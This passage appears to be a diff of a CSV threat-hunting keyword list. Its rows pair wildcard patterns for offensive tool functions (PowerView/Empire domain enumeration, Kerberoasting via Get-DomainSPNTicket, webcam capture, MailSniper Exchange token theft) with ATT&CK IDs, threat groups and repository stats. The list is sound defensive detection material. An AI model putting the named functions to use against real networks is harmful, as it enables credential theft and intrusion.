T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DomainDFSShareV1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DomainDFSShareV2*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-DomainForeignGroupMember*","offensive_tool_keyword","AD exploitation cheat sheet","Abusing inter-forest trust Powersploit","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://powersploit.readthedocs.io/en/latest/Recon/Get-DomainForeignGroupMember/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Get-DomainManagedSecurityGroup*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-DomainObjectACL -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-DomainSearcher*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*GetDomainsForEnumeration*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"*Get-DomainSpn*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SQLInstanceDomain.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DomainManagedSecurityGroup*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DomainObjectACL -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DomainSearcher*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*GetDomainsForEnumeration*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*Get-DomainSpn*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SQLInstanceDomain.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*getdomainspnticket*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" -"*Get-DomainSPNTicket*","offensive_tool_keyword","BloodHound","Kerberoasting With PowerView","T1558 - T1208 - T1552","TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","10","10","8799","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*Get-DomainSPNTicket*","offensive_tool_keyword","BloodHound","Kerberoasting With PowerView","T1558 - T1208 - T1552","TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" "*Get-DomainSPNTicket*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" -"*Get-DomainSPNTicket*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-DomainSPNTicket*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DomainSPNTicket*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DomainSPNTicket*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-DomainUser -TrustedToAuth | select userprincipalname","offensive_tool_keyword","AD exploitation cheat sheet","msds-allowedtodelegateto*","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","N/A","Lateral movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-DXWebcamVideo.ps1*","offensive_tool_keyword","SharpDXWebcam","Utilizing DirectX and DShowNET assemblies to record video from a host's webcam","T1123 - T1059.001 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/snovvcrash/SharpDXWebcam","1","1","N/A","8","1","68","10","2023-07-19T21:09:00Z","2023-07-12T03:26:24Z" -"*Get-ExchangeAccessToken*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Get-ExoPsAccessToken*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential 